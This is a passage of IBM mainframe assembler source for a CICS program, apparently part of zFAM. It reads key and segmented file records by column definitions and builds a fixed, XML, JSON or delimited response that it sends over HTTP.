********************************************************************* * Scan parser array and mark the segment * ********************************************************************* SY_0020 DS 0H XR R8,R8 Clear sign bits in register ZAP W_COLUMN,P_COL Move PA column to work area CVB R9,W_COLUMN Convert to binary D R8,=F'32000' Divide column by segment size LA R9,1(,R9) Relative to one. STH R9,P_SEG Mark segment number ********************************************************************* * Continue scan of parser array until EOPA * ********************************************************************* SY_0022 DS 0H LA R5,0(R6,R5) Point to next PA entry SR R4,R6 Subtract PA entry length BC B'0011',SY_0020 Continue PA scan ********************************************************************* * Segment array initialization complete. * * Prepare to scan parser array. * ********************************************************************* SY_0028 DS 0H L R4,PA_LEN Load parser array length L R5,PA_ADDR Load parser array address USING PA_DSECT,R5 ... tell assembler LA R6,E_PA Load parser array entry length OI W_F_LEN+7,X'0C' Set packed decimal sign bit OI W_COUNT+7,X'0C' Set packed decimal sign bit ********************************************************************* * Scan parser array tallying field lengths * ********************************************************************* SY_0030 DS 0H CLC P_ID,PD_ONE Primary key? BC B'1000',SY_0035 ... yes, skip tally AP W_F_LEN,P_LEN Add field length to total AP W_COUNT,PD_ONE Increment field count SY_0035 DS 0H CLC P_ID,PD_ONE Primary ID field? BC B'0111',SY_0050 ... no, continue parsing MVI W_PRI_ID,C'Y' ... yes, set primary ID flag ********************************************************************* * Issue GET CONTAINER for Primary Column Index * *********************************************************************** SY_0040 DS 0H MVC PI_NAME,P_NAME Move field name MVC PI_TYPE,P_TYPE Move field type MVC PI_LEN,P_LEN Move field length MVC PI_COL,P_COL Move field column * MVC C_NAME,P_NAME Move container name MVC C_LENGTH,P_LEN Move field length AP W_F_LEN,P_LEN Add field length to total BAS R14,GC_0010 Issue GET CONTAINER * ST R9,FD_ADDR Save field data address MVC FD_LEN,C_LENGTH Move field data length *********************************************************************** * Adjust field entry length then continue tallying field lengths * ********************************************************************* SY_0050 DS 0H LA R5,0(R6,R5) Point to next PA entry SR R4,R6 Subtract field entry length BC B'0011',SY_0030 Continue scan until EOT ********************************************************************* * Check results of scan and branch accordingly * ********************************************************************* SY_0060 DS 0H CLI W_PRI_ID,C'Y' Primary ID flag set? BC B'0111',ER_40001 ... no, SYNTAX error ********************************************************************* * Calculate GETMAIN length for Response Array * *********************************************************************** SY_0070 DS 0H CVB R1,W_F_LEN Convert field length to binary XC W_PDWA,W_PDWA Clear packed decimal work area MVC W_PDWA+4(4),PI_LEN Move primary key length CVB R13,W_PDWA Convert key length to binary AR R1,R13 Add key length to response * CLI R_TYPE,R_PLAIN Delimit by fixed length? BC B'1000',SY_0078 ... yes, set GETMAIN length * XR R14,R14 Clear even register CVB R15,W_COUNT Convert field county to binary * CLI R_TYPE,R_XML Delimit by XML tags? BC B'1000',SY_0072 ... yes, set length CLI R_TYPE,R_JSON Delimit by JSON tags? BC B'1000',SY_0074 ... yes, set length CLI R_TYPE,R_DELIM Delimit by pipe character? BC B'1000',SY_0076 ... yes, set length BC B'1111',SY_0078 ... no, default FIXED *********************************************************************** * Include XML tags in total length * ********************************************************************* SY_0072 DS 0H M R14,=F'37' Multiply count by XML length AR R1,R15 Add XML tags to field length BC B'1111',SY_0078 Set GETMAIN length ********************************************************************* * Include JSON tags in total length * ********************************************************************* SY_0074 DS 0H M R14,=F'24' Multiply count by JSON length AR R1,R15 Add JSON tags to field length A R1,=F'32' Add JSON tags to key field BC B'1111',SY_0078 Set GETMAIN length ********************************************************************* * Include PIPE tags in total length * ********************************************************************* SY_0076 DS 0H M R14,=F'1' Multiply count by PIPE length AR R1,R15 Add PIPE tags to field length BC B'1111',SY_0078 Set GETMAIN length ********************************************************************* * Issue GETMAIN for Response Array using total field length. * ********************************************************************* SY_0078 DS 0H ST R1,C_LENGTH Save in work area BAS R14,GM_0010 Issue GETMAIN ST R9,RA_ADDR Save Response Array address MVC RA_LEN,C_LENGTH Save Response Array length ********************************************************************* * Determine Primary Index field type and branch when numeric. * * Set key as character. * *********************************************************************** SY_0080 DS 0H OI PI_TYPE,X'40' Set upper case bit CLI PI_TYPE,C'N' Numeric? BC B'1000',SY_0090 ... yes, set key accordingly ZAP W_LENGTH,PI_LEN Move PA length to work area CVB R6,W_LENGTH Convert to binary MVI WK_KEY,X'40' Set first byte of key to space LR R1,R6 Load PI field length S R1,=F'1' Subtract one for space S R1,=F'1' Subtract one for EX MVC LA R14,WK_KEY Load target field address LA R14,1(,R14) Point past space LA R15,WK_KEY Load source field address EX R1,MVC_0080 Execute MVC instruction * L R1,FD_LEN Load field data length S R1,=F'1' Subtract one for EX MVC LA R14,WK_KEY Load FAxxKEY key address L R15,FD_ADDR Load field data address EX R1,MVC_0081 Execute MVC instruction * BC B'1111',SY_0100 Read FAxxKEY MVC_0080 MVC 0(0,R14),0(R15) Initial with spaces MVC_0081 MVC 0(0,R14),0(R15) Move PI to key *********************************************************************** * Set key as numeric. * *********************************************************************** SY_0090 DS 0H ZAP W_LENGTH,PI_LEN Move PA length to work area CVB R6,W_LENGTH Convert to binary MVI WK_KEY,X'F0' Set first byte of key to zero LR R1,R6 Load PI field length S R1,=F'1' Subtract one for zero S R1,=F'1' Subtract one for EX MVC LA R14,WK_KEY Load target field address LA R14,1(,R14) Point past zero LA R15,WK_KEY Load source field address EX R1,MVC_0090 Execute MVC instruction * L R1,FD_LEN Load field data length SR R6,R1 Subtract PI from maximum * S R1,=F'1' Subtract one for EX MVC LA R14,WK_KEY Load FAxxKEY key address LA R14,0(R6,R14) Adjust for field length L R15,FD_ADDR Load field data address EX R1,MVC_0091 Execute MVC instruction * BC B'1111',SY_0100 Read FAxxKEY MVC_0090 MVC 0(0,R14),0(R15) Initial with zeroes MVC_0091 MVC 0(0,R14),0(R15) Move PI to key *********************************************************************** * Issue READ for FAxxKEY using Primary Column Index. * ********************************************************************* SY_0100 DS 0H LA R1,E_DK Load KEY record length STH R1,WK_LEN Save KEY record length BAS R14,FK_0010 Issue READ for KEY structure OC EIBRESP,EIBRESP Normal response? BC B'0111',ER_20401 ... no, STATUS(204) ST R10,FK_ADDR Save KEY buffer address MVC FK_LEN,WK_LEN Save KEY buffer length USING DK_DSECT,R10 ... tell assembler ********************************************************************* * Issue READ for FAxxFILE using Primary Column Index. * ********************************************************************* SY_0110 DS 0H DROP R10 ... tell assembler L R5,PA_ADDR Load Parser Array address MVC WF_LEN,S_DF_LEN Move FILE record length MVC WF_SEG,P_SEG Set segment number BAS R14,FF_0010 Issue READ for FILE structure OC EIBRESP,EIBRESP Normal response? BC B'0111',ER_20402 ... no, STATUS(204) ST R10,FF_ADDR Save FILE buffer address USING DF_DSECT,R10 ... tell assembler MVC FF_LEN,WF_LEN Save FILE buffer length LA R1,DF_DATA Load data portion ST R1,W_FF_A Save data portion ********************************************************************* * Initialize Response Array and Primary column index. * *********************************************************************** SY_0120 DS 0H DROP R5 ... tell assembler L R8,PA_LEN Load parser array length L R9,PA_ADDR Load parser array address USING PA_DSECT,R9 ... tell assembler * L R5,RA_LEN Load response array length L R4,RA_ADDR Load response array address USING RA_DSECT,R4 ... tell assembler ST R4,RA_PTR Save RA pointer * STM 0,15,REGSAVE Save registers LA R14,HEX_00 Load source address LA R15,0 Load source length ICM R15,B'1000',HEX_00 Move pad byte MVCL R4,R14 Move nulls to response array LM 0,15,REGSAVE Load registers * CLI R_TYPE,R_JSON Result set JSON? BC B'0111',+8 ... no, continue BAS R14,RJ_0010 ... yes, create JSON tag L R4,RA_PTR Load RA pointer ZAP W_LENGTH,PI_LEN Move field data length CVB R1,W_LENGTH Load into register S R1,=F'1' Subtract one for EX MVC LR R14,R4 Load RA primary key address L R15,W_FF_A Load field data address ZAP W_COLUMN,PI_COL Move field column CVB R6,W_COLUMN Load into register S R6,=F'1' Make relative to zero LA R15,0(R6,R15) Adjust address with column EX R1,MVC_0120 Execute MVC instruction BC B'1111',SY_0130 Skip EX MVC MVC_0120 MVC 0(0,R14),0(R15) Move primaary key to RA *********************************************************************** * Adjust Response Array address and length * *********************************************************************** SY_0130 DS 0H ZAP W_LENGTH,PI_LEN Move field data length CVB R1,W_LENGTH Load into register SR R5,R1 Adjust Response Array length LA R4,0(R1,R4) Point to first field ST R4,RA_PTR Save as Response Array base * CLI R_TYPE,R_JSON Result set JSON? BC B'0111',+8 ... no, continue BAS R14,RJ_0020 ... yes, create JSON tag *********************************************************************** * Prepare to scan parser array for field definitions * ********************************************************************* SY_0140 DS 0H L R8,PA_LEN Load parser array length L R9,PA_ADDR Load parser array address ********************************************************************* * Scan Parser Array for field definitions. * ********************************************************************* SY_0150 DS 0H CLC P_ID,PD_ONE Primary index? BC B'1000',SY_0165 ... yes, get next entry CLC P_ID,PD_NINES Entry already processed? BC B'1000',SY_0160 ... yes, get next entry BC B'1111',SY_0170 ... no, check HI/LO range ********************************************************************* * Adjust Parser Array address and length * ********************************************************************* SY_0160 DS 0H SY_0165 DS 0H LA R1,E_PA Load parser array entry length LA R9,0(R1,R9) Point to next PA entry SR R8,R1 Subtract PA entry length BC B'0011',SY_0150 Continue when more entries BC B'1111',SY_0250 Scan PA for unprocessed entries ********************************************************************* * Check column number for HI/LO range for current segment * *********************************************************************** SY_0170 DS 0H ZAP W_COLUMN,P_COL Move PA column to work area CVB R1,W_COLUMN Load in R1 C R1,W_HI Is column beyond segment range? BC B'0011',SY_0160 ... yes, get next PA entry C R1,W_LO Is column before segment range? BC B'0100',SY_0160 ... yes, get next PA entry * MVC P_ID,PD_NINES Mark field as processed * *********************************************************************** * Calculate relative offset from current segment. * * * * To calculate relative offset from current segment: * * 1). Subtract 1 from current segment number, giving the * * relative segment number. * * 2). Multiple relative segment number by 32,000 giving the * * segment displacement. * * 3). Subtract segment displacement from column number giving * * relative displacement. * * * * For example, column 50 would be calculated as such: * * 1). Subtract 1 from current segment. Segment 1 will contain * * columns 1 thru 32,000. So for column 50, the relative segment * * number for step 1 would be zero. * * 2). Multiply relative segment zero by 32,000 giving segment * * displacement, which in this case is zero. * * 3). Subtract segment displacement from the column, which in this * * case is 50, giving the relative displacement of 50. * * * * Another example, column 64,075 would be calculated as such: * * 1). Subtract 1 from current segment. Segment 3 will contain * * columns 64,001 thru 96,000, so for column 64,075 the relative * * segment for step 1 would be two. * * 2). Multiply relative segment two by 32,000, giving segment * * displacement, which in this case would be 64,000. * * 3). Subtract segment displacement from the column, which in this * * case would be 64,000 from 64,075 resulting in a relative * * displacement of 75 * * * *********************************************************************** SY_0180 DS 0H XR R6,R6 Clear R6 * LH R7,DF_SEG Load segment number LH R7,W_SEG Load current segment number S R7,=F'1' Get relative segment number M R6,S_32K Multiply by max segment size * ... giving segment displacement ZAP W_COLUMN,P_COL Load column number CVB R1,W_COLUMN Convert from PD to binary SR R1,R7 Subtract segment displacement * ... giving relative displacement S R1,=F'1' ... then make relative to zero ST R1,W_REL_D Save relative displacement * ZAP W_LENGTH,P_LEN Set source length L R4,RA_PTR Load RA pointer * CLI R_TYPE,R_JSON Result set JSON? BC B'0111',+8 ... no, continue BAS R14,RJ_0030 ... yes, create JSON tag *********************************************************************** * Calculate width to determine if field spans a segment. * ********************************************************************* SY_0185 DS 0H L R1,W_REL_D Load relative displacement CVB R6,W_LENGTH Convert length to binary AR R6,R1 Add relative displacement ST R6,W_WIDTH Save field width C R6,S_32K Wider than 32K? BC B'0011',SY_0200 ... yes, spanned segment ********************************************************************* * Move field to Response Array. * *********************************************************************** SY_0190 DS 0H STM 0,15,REGSAVE Save registers CVB R7,W_LENGTH Set source length L R1,W_REL_D Load relative displacement L R6,W_FF_A Set source address LA R6,0(R1,R6) Add relative displacement LR R5,R7 Set target length * L R4,RA_PTR Set target address * MVCL R4,R6 Move field to Response Array LM 0,15,REGSAVE Load registers * CVB R1,W_LENGTH Load field length L R4,RA_PTR Load current RA pointer LA R4,0(R1,R4) Load the new RA pointer ST R4,RA_PTR Save the new RA pointer * CLI R_TYPE,R_JSON Result set JSON? BC B'0111',+8 ... no, continue BAS R14,RJ_0040 ... yes, create JSON tag BC B'1111',SY_0140 Continue Parser Array process *********************************************************************** * Field spans segments. * ********************************************************************* SY_0200 DS 0H STM 0,15,REGSAVE Save registers L R1,W_REL_D Load relative displacement L R6,W_WIDTH Load field width SR R6,R1 Subtract relative displacement ST R6,W_WIDTH Save field width ********************************************************************* * Move spanned segment field to Response Array * *********************************************************************** SY_0210 DS 0H L R6,W_REL_D Load relative displacement L R1,S_32K Load 32K length SR R1,R6 Subtract relative displacement ST R1,W_REL_L Set relative length L R6,W_FF_A Set source address L R15,W_REL_D Load relative displacement LA R6,0(R15,R6) Adjust relative displacement LR R5,R1 Set source length LR R7,R1 Set target length * L R4,RA_PTR Set target address * MVCL R4,R6 Move field to Response Array * L R1,W_REL_L Load relative length L R4,RA_PTR Load current RA pointer LA R4,0(R1,R4) Load the new RA pointer ST R4,RA_PTR Save the new RA pointer * CVB R1,W_LENGTH Convert current field length S R1,W_REL_L Subtract relative length CVD R1,W_LENGTH Save remaining length * XC W_REL_D,W_REL_D Zero relative displacement L R1,W_WIDTH Load width L R15,W_REL_L Load relative length SR R1,R15 Subtract relative length ST R1,W_WIDTH Save width * LH R1,WF_SEG Load segment number LA R1,1(0,R1) Increment by one STH R1,WF_SEG Save segment number * MVC WF_LEN,S_DF_LEN Move FILE record length BAS R14,FF_0010 Issue READ for FILE structure OC EIBRESP,EIBRESP Normal response? BC B'0111',ER_20403 ... no, STATUS(204) ST R10,FF_ADDR Save FILE buffer address USING DF_DSECT,R10 ... tell assembler LA R1,DF_DATA Load data portion ST R1,W_FF_A Save data portion MVC FF_LEN,WF_LEN Save FILE buffer length MVC SS_SEG,WF_SEG Save spanned segment number * CLC W_WIDTH,S_32K Width more than 32K? BC B'0011',SY_0210 ... yes, move spanned segments * *********************************************************************** * Move remainder of spanned segment field to Response Array. * ********************************************************************* SY_0220 DS 0H L R1,W_REL_D Load relative displacement BC B'1111',SY_0185 Move remainder to RA ********************************************************************* * Scan parser array if there are any fields that are yet to be * * processed. When fields in the parser array are not on the current * * record segment, the entry is skipped requiring the parser array to * * be scanned until all entries are tagged as processed by the '999' * * P_ID. * ********************************************************************* SY_0250 DS 0H L R8,PA_LEN Load parser array length L R9,PA_ADDR Load parser array address LA R1,E_PA Load parser array entry length ********************************************************************* * Search for unprocessed parser array entry * *********************************************************************** SY_0260 DS 0H CLC P_ID,PD_ONE Primary index? BC B'1000',SY_0270 ... yes, continue CLC P_ID,PD_NINES Processed entry? BC B'1000',SY_0270 ... yes, continue L R8,PA_LEN Load parser array length L R9,PA_ADDR Load parser array address * MVC WF_LEN,S_DF_LEN Move FILE record length MVC WF_SEG,P_SEG Set segment number BAS R14,FF_0010 Issue READ for FILE structure OC EIBRESP,EIBRESP Normal response? BC B'0111',ER_20405 ... no, STATUS(204) ST R10,FF_ADDR Save FILE buffer address USING DF_DSECT,R10 ... tell assembler MVC FF_LEN,WF_LEN Save FILE buffer length LA R1,DF_DATA Load data portion ST R1,W_FF_A Save data portion * BC B'1111',SY_0140 Process parser array *********************************************************************** * Check parser array entries until EOPA * *********************************************************************** SY_0270 DS 0H LA R9,0(R1,R9) point to next PA entry SR R8,R1 Subtract PA entry length BC B'0011',SY_0260 Continue when more PA entries BC B'1111',SY_0300 Send response array when EOPA * *********************************************************************** * Send response * *********************************************************************** SY_0300 DS 0H L r4,RA_PTR Load RA pointer * CLI R_TYPE,R_JSON Result set JSON? BC B'0111',+8 ... no, continue BAS R14,RJ_0050 ... yes, create JSON tag BAS R14,WS_0010 Issue WEB SEND BC B'1111',RETURN Return to CICS *********************************************************************** * Secondar Column Index section * *********************************************************************** SY_0400 DS 0H * *********************************************************************** * Return to caller * ********************************************************************** RETURN DS 0H EXEC CICS RETURN * *********************************************************************** * Issue GET CONTAINER (SET Register) * * This is used for Parser Array and Primary Column Index * *********************************************************************** GC_0010 DS 0H ST R14,BAS_REG Save return register * EXEC CICS GET CONTAINER(C_NAME) X SET(R9) X FLENGTH(C_LENGTH) X CHANNEL(C_CHAN) X NOHANDLE * L R14,BAS_REG Load return register BCR B'1111',R14 Return to caller * *********************************************************************** * Issue GET CONTAINER for Options Table (INTO EISTG) * *********************************************************************** GC_0020 DS 0H ST R14,BAS_REG Save return register * EXEC CICS GET CONTAINER(C_NAME) X INTO(O_TABLE) X FLENGTH(C_LENGTH) X CHANNEL(C_CHAN) X NOHANDLE * L R14,BAS_REG Load return register BCR B'1111',R14 Return to caller * * *********************************************************************** * Issue GETMAIN for Response Array * *********************************************************************** GM_0010 DS 0H ST R14,BAS_REG Save return register * EXEC CICS GETMAIN X SET(R9) X FLENGTH(C_LENGTH) X INITIMG(HEX_00) X NOHANDLE * L R14,BAS_REG Load return register BCR B'1111',R14 Return to caller * *********************************************************************** * Issue READ for FAxxKEY structure * *********************************************************************** FK_0010 DS 0H ST R14,BAS_REG Save return register MVC WK_FCT(08),SK_FCT Move KEY structure name MVC WK_TRAN,EIBTRNID Move KEY structure ID * CLC O_WITH,=C'UR' Uncommitted read request? BC B'1000',FK_00UR ... yes, issue READ w/o UPDATE BC B'0111',FK_00CR ... no, issue READ w/ UPDATE * *********************************************************************** * Uncommitted READ (WITH(UR)) * *********************************************************************** FK_00UR DS 0H EXEC CICS READ FILE(WK_FCT) X SET(R10) X RIDFLD (WK_KEY) X LENGTH (WK_LEN) X NOHANDLE BC B'1111',FK_0020 Continue process * *********************************************************************** * Committed READ (WITH(CR)) * *********************************************************************** FK_00CR DS 0H EXEC CICS READ FILE(WK_FCT) X SET(R10) X RIDFLD (WK_KEY) X LENGTH (WK_LEN) X UPDATE X NOHANDLE BC B'1111',FK_0020 Continue process * *********************************************************************** * Set FILE structure key fields and return * *********************************************************************** FK_0020 DS 0H USING DK_DSECT,R10 ... tell assembler * MVC WF_DD,DK_DD Move FILE structure name MVC WF_IDN,DK_F_IDN Move FILE IDN MVC WF_NC,DK_F_NC Move FILE NC * DROP R10 ... tell assembler * L R14,BAS_REG Load return register BCR B'1111',R14 Return to caller * *********************************************************************** * Issue READ for FAxxFILE structure * * When the spanned segment number is equal to the WF_SEG, then the * * segment has already been read during spanned segment processing. * *********************************************************************** FF_0010 DS 0H ST R14,BAS_REG Save return register * CLC SS_SEG,WF_SEG Segment numbers equal? BC B'1000',FF_0020 ... yes, record is in the buffer * MVC WF_TRAN,EIBTRNID Move FILE structure ID * EXEC CICS READ FILE(WF_FCT) X SET(R10) X RIDFLD (WF_KEY) X LENGTH (WF_LEN) X NOHANDLE * USING DF_DSECT,R10 ... tell assembler * MVC W_SEG,DF_SEG Move segment number LH R1,DF_SEG Load segment number XR R6,R6 Clear R6 L R7,S_32K Load maximum segment size MR R6,R1 Create Column HI range ST R7,W_HI Save as segment HI range S R7,S_32K Subtract segment size A R7,=F'1' Add one to create segment LO ST R7,W_LO Save as segment LO range * FF_0020 DS 0H L R14,BAS_REG Load return register BCR B'1111',R14 Return to caller DROP R10 ... tell assembler * *********************************************************************** * Transfer control to error logging program zFAM090 * *********************************************************************** PC_0010 DS 0H LA R1,E_LOG Load COMMAREA length STH R1,L_LOG Save COMMAREA length * EXEC CICS XCTL PROGRAM(ZFAM090) X COMMAREA(C_LOG) X LENGTH (L_LOG) X NOHANDLE * EXEC CICS WEB SEND X FROM (H_CRLF) X FROMLENGTH(H_TWO) X ACTION (H_ACTION) X MEDIATYPE (H_MEDIA) X STATUSCODE(H_500) X STATUSTEXT(H_500_T) X STATUSLEN (H_500_L) X SRVCONVERT X NOHANDLE * BC B'1111',RETURN Return (if XCTL fails) *********************************************************************** * Send response (WEB SEND) * *********************************************************************** WS_0010 DS 0H ST R14,BAS_REG Save return register L R4,RA_ADDR Load response array address USING RA_DSECT,R4 ... tell assembler * MVC WS_LEN,RA_LEN Set WEB SEND length * CLI R_TYPE,R_JSON Result set JSON? BC B'0111',+8 ... no, continue BAS R14,RJ_0060 ... yes, get RA length EXEC CICS WEB WRITE X HTTPHEADER (H_ROWS) X NAMELENGTH (H_ROWS_L) X VALUE (M_ROWS) X VALUELENGTH(M_ROWS_L) X NOHANDLE * EXEC CICS WEB SEND X FROM (RA_DSECT) X FROMLENGTH(WS_LEN) X ACTION (H_ACTION) X MEDIATYPE (H_MEDIA) X STATUSCODE(H_200) X STATUSTEXT(H_200_T) X STATUSLEN (H_200_L) X SRVCONVERT X NOHANDLE * L R14,BAS_REG Load return register BCR B'1111',R14 Return to caller * *********************************************************************** * JSON pre-key tags - begin. * *********************************************************************** RJ_0010 DS 0H ST R14,RJ_REG Save return register * STM 0,15,REGSAVE Save all registers * L R4,RA_PTR Load response array pointer *********************************************************************** * Create Primary key JSON tag. * *********************************************************************** RJ_0013 DS 0H MVI 0(R4),C'{' Move JSON bracket MVI 1(R4),C'"' Move double quote LA R4,2(0,R4) Bump RA * LA R6,PI_NAME Load Primary name address LA R5,16 Load Primary name max length *********************************************************************** * Space marks end of Primary Key name * ********************************************************************* RJ_0014 DS 0H CLI 0(R6),C' ' End of Primary name? BC B'1000',RJ_0015 ... yes, mark JSON field end MVC 0(1,R4),0(R6) ... no, use to create JSON tag LA R4,1(,R4) Bump RA LA R6,1(,R6) Bump Primary name pointer BCT R5,RJ_0014 Continue moving Primary name ********************************************************************* * Mark end of Primary key JSON tag. When the field is 'character' * * set the double quotes before data is moved to the response array. * ********************************************************************* RJ_0015 DS 0H MVI 0(R4),C'"' Move double quote MVI 1(R4),C':' Move colon LA R4,2(,R4) Bump RA CLI PI_TYPE,C'N' Numeric field? BC B'1000',RJ_0019 ... yes, continue MVI 0(R4),C'"' ... no, move double quote LA R4,1(,R4) Bump RA ********************************************************************* * JSON pre-key tags - finish. * *********************************************************************** RJ_0019 DS 0H ST R4,RA_PTR Save RA pointer LM 0,15,REGSAVE Load all registers L R14,RJ_REG Load return register BCR B'1111',R14 Return to caller * *********************************************************************** * JSON post-key tags - begin. * * When processing character field, include the double quote. * *********************************************************************** RJ_0020 DS 0H ST R14,RJ_REG Save return register * STM 0,15,REGSAVE Save all registers * L R4,RA_PTR Load response array pointer CLI O_P_TYPE,C'N' Numeric field? BC B'1000',RJ_0021 ... yes, continue MVI 0(R4),C'"' ... no, move double quote LA R4,1(,R4) Bump RA *********************************************************************** * The comma to separate JSON fields is moved before each data field * * is created. This insures that a trailing comma is not included in * * the response array. * ********************************************************************* RJ_0021 DS 0H ********************************************************************* * JSON post-key tags - finish. * *********************************************************************** RJ_0029 DS 0H ST R4,RA_PTR Save RA pointer LM 0,15,REGSAVE Load all registers L R14,RJ_REG Load return register BCR B'1111',R14 Return to caller * *********************************************************************** * JSON pre-field tags - begin. * * Include the comma, which separates each record in the array. * *********************************************************************** RJ_0030 DS 0H ST R14,RJ_REG Save return register * STM 0,15,REGSAVE Save all registers * L R4,RA_PTR Load response array pointer MVI 0(R4),C',' Move a comma LA R4,1(0,R4) Bump RA *********************************************************************** * Create field JSON tag. * *********************************************************************** RJ_0031 DS 0H MVI 0(R4),C'"' Move double quote LA R4,1(0,R4) Bump RA * LA R6,P_NAME Load PA field name address LA R5,16 Load PA field name max length *********************************************************************** * Space marks end of field names * ********************************************************************* RJ_0032 DS 0H CLI 0(R6),C' ' End of field name? BC B'1000',RJ_0033 ... yes, mark JSON field end MVC 0(1,R4),0(R6) ... no, use to create JSON tag LA R4,1(,R4) Bump RA LA R6,1(,R6) Bump Primary name pointer BCT R5,RJ_0032 Continue moving field name ********************************************************************* * Mark end of field name JSON tag. When the field is 'character' * * set the double quotes before data is moved to the response array. * ********************************************************************* RJ_0033 DS 0H MVI 0(R4),C'"' Move double quote MVI 1(R4),C':' Move colon LA R4,2(,R4) Bump RA CLI P_TYPE,C'N' Numeric field? BC B'1000',RJ_0039 ... yes, continue MVI 0(R4),C'"' ... no, move double quote LA R4,1(,R4) Bump RA ********************************************************************* * JSON pre-field tags - finish. * *********************************************************************** RJ_0039 DS 0H ST R4,RA_PTR Save RA pointer LM 0,15,REGSAVE Load all registers L R14,RJ_REG Load return register BCR B'1111',R14 Return to caller * *********************************************************************** * JSON post-field tags - begin. * * When processing character field, include the double quote. * *********************************************************************** RJ_0040 DS 0H ST R14,RJ_REG Save return register * STM 0,15,REGSAVE Save all registers * L R4,RA_PTR Load response array pointer CLI P_TYPE,C'N' Numeric field? BC B'1000',RJ_0041 ... yes, continue MVI 0(R4),C'"' ... no, move double quote LA R4,1(,R4) Bump RA *********************************************************************** * The comma to separate JSON fields is moved before each data field * * is created. This insures that a trailing comma is not included in * * the response array. * ********************************************************************* RJ_0041 DS 0H ********************************************************************* * JSON post-field tags - finish. * *********************************************************************** RJ_0049 DS 0H ST R4,RA_PTR Save RA pointer LM 0,15,REGSAVE Load all registers L R14,RJ_REG Load return register BCR B'1111',R14 Return to caller * *********************************************************************** * JSON end of array indicator. * *********************************************************************** RJ_0050 DS 0H ST R14,RJ_REG Save return register * STM 0,15,REGSAVE Save all registers * L R4,RA_PTR Load response array pointer MVI 0(R4),C'}' Move JSON end of array marker LA R4,1(,R4) Bump RA ST R4,RA_PTR Save RA pointer * LM 0,15,REGSAVE Load all registers L R14,RJ_REG Load return register BCR B'1111',R14 Return to caller * *********************************************************************** * Set WEB SEND length by scanning Response Array until hitting a null * * character. The GETMAIN for the Response Array is calculated using * * the maximum field names of 16 bytes, however the actual field names * * can be from 1-16 bytes. * *********************************************************************** RJ_0060 DS 0H ST R14,RJ_REG Save return register * STM 0,15,REGSAVE Save all registers * XR R15,R15 Response Array counter L R6,RA_ADDR Load response array address L R5,RA_LEN Load response array length *********************************************************************** * Search Response Array for null character * ********************************************************************* RJ_0061 DS 0H CLI 0(R6),X'00' Null character? BC B'1000',RJ_0062 ... yes, set WEB SEND length LA R15,1(0,R15) Add 1 to RA counter LA R6,1(,R6) Bump RA pointer BCT R5,RJ_0061 Continue searching for null ********************************************************************* * Set WEB SEND length using R15 counter. * *********************************************************************** RJ_0062 DS 0H ST R15,WS_LEN Save WEB SEND length * LM 0,15,REGSAVE Load all registers L R14,RJ_REG Load return register BCR B'1111',R14 Return to caller * * *********************************************************************** * Issue TRACE command. * *********************************************************************** TR_0010 DS 0H ST R14,BAS_REG Save return register STM 0,15,REGSAVE Save registers * * BC B'1111',TR_0020 Bypass trace * EXEC CICS ENTER TRACENUM(T_46) X FROM(W_46_M) X FROMLENGTH(T_LEN) X RESOURCE(T_RES) X NOHANDLE * TR_0020 DS 0H LM 0,15,REGSAVE Load registers L R14,BAS_REG Load return register BCR B'1111',R14 Return to caller * *********************************************************************** * STATUS(204) * ********************************************************************* ER_20401 DS 0H MVC C_STATUS,S_204 Set STATUS MVC C_REASON,=C'01' Set REASON BC B'1111',PC_0010 Transfer control to logging ********************************************************************* * STATUS(204) * ********************************************************************* ER_20402 DS 0H MVC C_STATUS,S_204 Set STATUS MVC C_REASON,=C'02' Set REASON BC B'1111',PC_0010 Transfer control to logging ********************************************************************* * STATUS(204) * ********************************************************************* ER_20403 DS 0H MVC C_STATUS,S_204 Set STATUS MVC C_REASON,=C'03' Set REASON BC B'1111',PC_0010 Transfer control to logging ********************************************************************* * STATUS(204) * ********************************************************************* ER_20404 DS 0H MVC C_STATUS,S_204 Set STATUS MVC C_REASON,=C'04' Set REASON BC B'1111',PC_0010 Transfer control to logging ********************************************************************* * STATUS(204) * ********************************************************************* ER_20405 DS 0H MVC C_STATUS,S_204 Set STATUS MVC C_REASON,=C'05' Set REASON BC B'1111',PC_0010 Transfer control to logging ********************************************************************* * STATUS(400) * *********************************************************************** ER_40001 DS 0H MVC C_STATUS,S_400 Set STATUS MVC C_REASON,=C'01' Set REASON BC B'1111',PC_0010 Transfer control to logging * *********************************************************************** * Define Constant fields * *********************************************************************** * DS 0F HEX_00 DC XL01'00' Nulls DS 0F HEX_40 DC 16XL01'40' Spaces DS 0F S_204 DC CL03'204' HTTP STATUS(204) DS 0F S_400 DC CL03'400' HTTP STATUS(400) DS 0F ONE DC F'1' One S_OT_LEN DC F'80' OPTIONS table maximum length S_PA_LEN DC F'8192' Parser Array maximum length S_FD_LEN DC F'65000' Field Define maximum length S_RA_LEN DC F'3200000' Response Array maximum length DS 0F S_DF_LEN DC H'32700' FAxxFILE maximum length DS 0F S_32K DC F'32000' Maximum segment length DS 0F PD_ZERO DC XL02'000F' Packed decimal zeroes PD_ONE DC XL02'001F' Packed decimal zeroes PD_NINES DC XL02'999F' Packed decimal nines ZD_ONE DC CL04'0001' Zoned decimal 0001 DS 0F ZFAM090 DC CL08'ZFAM090 ' zFAM Loggin and error program SK_FCT DC CL08'FAxxKEY ' zFAM KEY structure SF_FCT DC CL08'FAxxFILE' zFAM FILE structure C_CHAN DC CL16'ZFAM-CHANNEL ' zFAM channel C_OPTION DC CL16'ZFAM-OPTIONS ' OPTIONS container C_TTL DC CL16'ZFAM-TTL ' TTL container C_ARRAY DC CL16'ZFAM-ARRAY ' ARRAY container DS 0F S_FIXED DC CL09'FIXED ' Format FIXED DS 0F S_XML DC CL09'XML ' Format XML DS 0F S_JSON DC CL09'JSON ' Format JSON DS 0F S_DELIM DC CL09'DELIMITER' Format DELIMITER DS 0F *********************************************************************** * HTTP resources * ********************************************************************* H_TWO DC F'2' Length of CRLF H_CRLF DC XL02'0D25' Carriage Return Line Feed H_500 DC H'500' HTTP STATUS(500) H_500_L DC F'48' HTTP STATUS TEXT Length H_500_T DC CL16'03 Service unava' HTTP STATUS TEXT Length DC CL16'ilable and loggi' ... continued DC CL16'ng disabled ' ... and complete DS 0F H_200 DC H'200' HTTP STATUS(200) H_200_L DC F'32' HTTP STATUS TEXT Length H_200_T DC CL16'00 Request succe' HTTP STATUS TEXT Length DC CL16'ssful. ' ... continued DS 0F H_ACTION DC F'02' HTTP SEND ACTION(IMMEDIATE) H_MEDIA DC CL56'text/plain' HTTP Media type DS 0F M_ROWS_L DC F'04' HTTP Header message length M_ROWS DC CL04'0001' HTTP Header message H_ROWS_L DC F'09' HTTP Header 